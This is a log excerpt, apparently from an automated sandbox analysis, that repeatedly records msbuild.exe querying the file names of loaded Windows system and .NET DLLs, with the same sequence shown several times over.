Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Fn
Module Get Filename module_name = c:\windows\syswow64\user32.dll, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\CRYPTSP.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rsaenh.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\bcrypt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\RpcRtRemote.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CLBCatQ.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\OLEAUT32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wbemdisp.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbemcomn.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\WS2_32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\NSI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wbemprox.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wmiutils.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wbemsvc.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\fastprox.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\NTDSAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\SXS.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\CustomMarshalers\bf7e7494e75e32979c7824a07570a8a9\CustomMarshalers.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\System.Management.ni.dll, size = 2048 True 1
Fn
Module Get Filename module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\wminet_utils.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\dwmapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\bc09ad2d49d8535371845cd7532f9271\System.Configuration.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\461d3b6b3f43e6fbe6c897d5936e17e4\System.Xml.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rasapi32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rasman.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rtutils.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\mswsock.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\System32\wshtcpip.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\System32\wship6.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\winhttp.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\webio.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\IPHLPAPI.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\WINNSI.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\dhcpcsvc6.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\dhcpcsvc.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\credssp.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CFGMGR32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\DNSAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rasadhlp.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\System32\fwpuclnt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\shfolder.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 1
Fn
Module Get Filename module_name = private_0x0000000000400000, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Fn
Module Get Filename module_name = c:\windows\syswow64\advapi32.dll, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Fn
Module Get Filename module_name = c:\windows\syswow64\user32.dll, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\CRYPTSP.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rsaenh.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\bcrypt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\RpcRtRemote.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CLBCatQ.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\OLEAUT32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wbemdisp.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbemcomn.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\WS2_32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\NSI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wbemprox.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wmiutils.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wbemsvc.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\fastprox.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\NTDSAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\SXS.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\CustomMarshalers\bf7e7494e75e32979c7824a07570a8a9\CustomMarshalers.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\System.Management.ni.dll, size = 2048 True 1
Fn
Module Get Filename module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\wminet_utils.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\dwmapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\bc09ad2d49d8535371845cd7532f9271\System.Configuration.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\461d3b6b3f43e6fbe6c897d5936e17e4\System.Xml.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rasapi32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rasman.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rtutils.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\mswsock.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\System32\wshtcpip.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\System32\wship6.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\winhttp.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\webio.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\IPHLPAPI.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\WINNSI.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\dhcpcsvc6.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\dhcpcsvc.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\credssp.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CFGMGR32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\DNSAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rasadhlp.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\System32\fwpuclnt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\shfolder.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 1
Fn
Module Get Filename module_name = private_0x0000000000400000, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Fn
Module Get Filename module_name = c:\windows\syswow64\advapi32.dll, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Fn
Module Get Filename module_name = c:\windows\syswow64\user32.dll, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Fn
